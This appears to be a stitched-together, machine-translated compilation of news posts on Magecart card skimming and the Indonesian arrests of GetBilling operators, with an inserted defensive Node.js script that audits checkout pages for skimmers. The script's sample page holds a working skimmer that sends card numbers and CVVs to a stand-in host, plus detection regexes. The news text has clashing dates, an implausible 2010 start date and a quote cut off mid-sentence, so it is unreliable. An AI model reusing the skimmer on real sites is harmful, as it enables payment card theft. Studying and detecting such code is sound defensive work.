Magecart web skimming groups have infected hundreds of thousands of sites

Carding

Attacks in which cybercriminals compromise online store sites to steal users' bank card details continue to gain traction. These malicious campaigns share a common name, Magecart, under which numerous groups operate.

These cybercriminals use a technique known as web skimming: special JavaScript code is placed on the attacked site, copying the user's card data and sending it to the attacker's server.

Injection of malicious code can be achieved in two ways: by hacking the resource directly, or by loading the code through third-party elements (for example, an analytics script or a customer support widget).

Researchers at RiskIQ argue that the first Magecart activity arose on August 8, 2010. Since then, many cyber groups have created skimming scripts in an attempt to infect thousands of sites.

RiskIQ estimates that millions of users have become victims of Magecart - the data collected by analysts showed 2,086,529 cases of Magecart activity being detected. The company believes that attacks on supply chains are the main reason for the surge in Magecart activity.

Of all the Magecart class groups, experts single out Group 5 - it is the most "advanced" and successful. The members of this group specialize in third-party providers: SociaPlus and Inbenta, which provide analytics. Group 5 in the course of its activities managed to intercept the payment data of hundreds of sites.

Unsecured and misconfigured Amazon S3 buckets are also targeted by these cybercriminals, as they typically store resources used by multiple domains.

Since the beginning of April this year, RiskIQ has been monitoring the compromise of S3 buckets, collecting disappointing statistics: attackers have injected scripts on more than 18,000 hosts.
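The post above describes the skimmer's two ways onto a checkout page (direct compromise of the site, or a third-party script such as analytics or a support widget) and the abuse of S3-hosted assets. Below is an added example, not code from the post or from RiskIQ, of a static triage script in Node.js that enumerates the `<script>` tags on a page and flags exactly those paths: third-party script hosts not on a first-party allowlist, external scripts without Subresource Integrity, hosts on Amazon S3, and inline code that both reads payment fields and contains an exfiltration sink. The allowlist, page URL and the sample HTML are constructed for this example; the tag parsing is regex-based and only sees static HTML, so it will not catch skimmers injected into the live DOM at runtime.

```javascript
// Added example (not from the original post): static triage of a checkout
// page for Magecart-style script injection. Run with: node audit.js
// Assumptions: ALLOWED_HOSTS, PAGE_URL and SAMPLE_HTML below are constructed
// for this example; the integrity value is a placeholder, not a real hash.

const SCRIPT_TAG = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
const ATTR = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
// bucket.s3.amazonaws.com, bucket.s3.eu-west-1.amazonaws.com, s3.amazonaws.com
const S3_HOST = /(^|\.)s3([.-][a-z0-9-]+)?\.amazonaws\.com$/i;

// A skimmer has to read payment fields and then get the data off the page;
// inline code that does both deserves a manual look.
const CARD_FIELD = /cc[-_]?num|card[-_]?number|cardnumber|cvv|cvc|ccexp|expir/i;
const EXFIL_SINK = /XMLHttpRequest|\bfetch\s*\(|sendBeacon|\bnew\s+Image\s*\(|\.src\s*=|\bWebSocket\b/;

// Parse the attribute string of one <script ...> tag into an object.
function parseAttrs(raw) {
  const attrs = {};
  for (const m of raw.matchAll(ATTR)) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4] ?? '';
  }
  return attrs;
}

// Returns a list of findings, each { kind, ...details }.
function auditScripts(html, allowedHosts, pageUrl) {
  const findings = [];
  for (const m of html.matchAll(SCRIPT_TAG)) {
    const attrs = parseAttrs(m[1]);
    const body = m[2];
    if (attrs.src === undefined) {
      // Inline script: the "hacked the resource directly" path.
      if (CARD_FIELD.test(body) && EXFIL_SINK.test(body)) {
        findings.push({ kind: 'inline-skimmer-pattern', snippet: body.trim().slice(0, 80) });
      }
      continue;
    }
    let host;
    try {
      host = new URL(attrs.src, pageUrl).hostname; // resolves relative srcs
    } catch {
      findings.push({ kind: 'unparseable-src', src: attrs.src });
      continue;
    }
    if (!allowedHosts.includes(host)) {
      // External script: the "third-party element" path.
      findings.push({ kind: 'third-party-host', host, src: attrs.src });
    }
    if (!attrs.integrity) {
      // Without Subresource Integrity a compromised host can swap the file.
      findings.push({ kind: 'missing-sri', host, src: attrs.src });
    }
    if (S3_HOST.test(host)) {
      findings.push({ kind: 's3-hosted', host, src: attrs.src });
    }
  }
  return findings;
}

// Tally findings by kind, e.g. { 'missing-sri': 2, 's3-hosted': 1 }.
function countByKind(findings) {
  const counts = {};
  for (const f of findings) counts[f.kind] = (counts[f.kind] || 0) + 1;
  return counts;
}

// Constructed sample page: a first-party script with SRI, an analytics
// script, a library served from an S3 bucket, and an inline hook that reads
// the card fields on submit and sends them out through an image request.
const SAMPLE_HTML = `
<html><head>
<script src="/static/checkout.js" integrity="sha384-AAAA"></script>
<script src="https://cdn.example-analytics.invalid/track.js"></script>
<script src="https://assets-shop.s3.amazonaws.com/lib/jquery.min.js"></script>
<script>
  document.forms[0].addEventListener('submit', function () {
    var d = document.getElementById('card_number').value + '|' +
            document.getElementById('cvv').value;
    new Image().src = 'https://stats.example-bad.invalid/i.gif?d=' + btoa(d);
  });
</script>
</head><body></body></html>`;

const ALLOWED_HOSTS = ['shop.example']; // assumed first-party host
const PAGE_URL = 'https://shop.example/checkout';

function runSample() {
  return auditScripts(SAMPLE_HTML, ALLOWED_HOSTS, PAGE_URL);
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of runSample()) console.log(JSON.stringify(f));
}
```

On the sample page this reports two third-party hosts, two scripts without SRI, one S3-hosted script and one inline skimmer pattern; the first-party script with an integrity attribute produces nothing. In practice the same checks should run against the rendered DOM (headless browser) and be diffed against a known-good baseline, and the allowlist should be enforced by a Content-Security-Policy `script-src` directive with `connect-src` and `img-src` restricted so that even an injected script has nowhere to send the card data.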
 

Jollier

Indonesia arrested three carders practicing MageCart attacks

The Indonesian cyber police, together with Interpol and Group-IB, announced the arrest of members of a criminal group who infected hundreds of online stores with JavaScript sniffers in Australia, Brazil, Great Britain, Germany, Indonesia, the United States and other countries of the world. Among the victims are Russian and Ukrainian users.

Let me remind you that initially the name MageCart was assigned to one hack group, which was the first to install web skimmers on the websites of online stores to steal bank card data. But this approach was so successful that the group soon had numerous imitators, the name MageCart became a household name, and it now denotes a whole class of such attacks. And if in 2020 RiskIQ researchers identified 12 such groups, then at the end of 2020, according to IBM, there were already about 38 of them.

Law enforcement officials and Group-IB report that criminals stole bank card details from customers and used them to buy gadgets and luxury goods. The liquidation of this criminal group was the first successful operation against Magecart operators in the Asia-Pacific region (APAC).

The joint operation "Night Fury" of the Indonesian Cyber Police, INTERPOL's ASEAN Cyber Capability Desk (ASEAN Desk) and the Group-IB Investigation Department at APAC was carried out in December 2019. As a result, three Indonesian residents aged 23 to 35 were arrested. All of them are charged with stealing electronic data using the GetBilling family of sniffers. Operations in five more regions are still ongoing.

Group-IB specialists first described this family of sniffers in the Crime Without Punishment report in April 2021, and have been tracking the GetBilling JS-sniffer family since 2018. An analysis of the infrastructure controlled by the GetBilling operators arrested in Indonesia showed that they managed to infect almost 200 websites in Indonesia, Australia, Europe, the United States, South America and several other countries. According to preliminary estimates, in a week the cybercriminals collected about a thousand unique cards and account passwords from infected sites.

As early as last year, experts managed to establish that part of the GetBilling infrastructure was deployed in Indonesia. Interpol promptly notified the Indonesian cyber police. Although the GetBilling sniffer operators tried to hide their location (for example, the criminals always used a VPN to connect to the server that collected stolen data and controlled the sniffer, and only stolen cards were used to pay for hosting services and buy new domains), Group-IB worked with local police to gather evidence that the group was operating out of Indonesia and then track down the suspects themselves.

[image pic3-2x.jpg] An example of a malicious GetBilling script

[image pic2-2x.jpg] An example of a record of stolen payment and personal data stored on GetBilling servers.

It is reported that during the search, the police seized laptops, mobile phones of various manufacturers, processors, identification cards and bank cards from the detainees. According to the investigation, the stolen payment information was used by the suspects to buy gadgets and luxury goods, which they then resold on Indonesian sites below market value. The suspects have already been charged with theft of electronic data, a crime punishable by up to ten years in prison under the Indonesian criminal code. The investigation is ongoing.

It is worth noting that Sanguine Security experts write that this group included more members who are still at large. The group has been active since 2017, according to the company, and its malicious code has been found on 571 sites, 17 of which are still infected because the store owners failed to clean their sites properly.

Sanguine Security also says the group's code was easy to track because of a recurring message, "Success gan", which translates from Indonesian roughly as "success, bro".

“This case clearly demonstrates the international scope of cybercrime: JS sniffer operators lived in Indonesia, but attacked e-commerce resources around the world, which made it difficult to collect evidence, find victims and prosecute. However, international cooperation and data exchange can help effectively counter current cyber threats. Thanks to the prompt action of the Indonesian cyber police and Interpol, "Night Fury" became the first successful international operation against JavaScript sniffer operators in the APAC region. This is an excellent example of a coordinated cross-border cybercrime fight, and we are proud that the result of our Threat Intelligence, understanding of criminal schemes and their investigation, as well as forensic research of the data by Group-IB specialists helped to identify suspects. We hope,

“Operation Night Fury proved that all obstacles can only be overcome through close cooperation between law enforcement agencies, international organizations and private companies. Coordination of efforts between the Indonesian cyber police, Interpol and Group-IB has made it possible to attribute crimes, identify criminals who used sniffers, and arrest them. More importantly, it has helped protect innocent people and raise public awareness of cybercrime and its consequences,” said Idam Wasiyadin, Police Superintendent of Indonesia.
 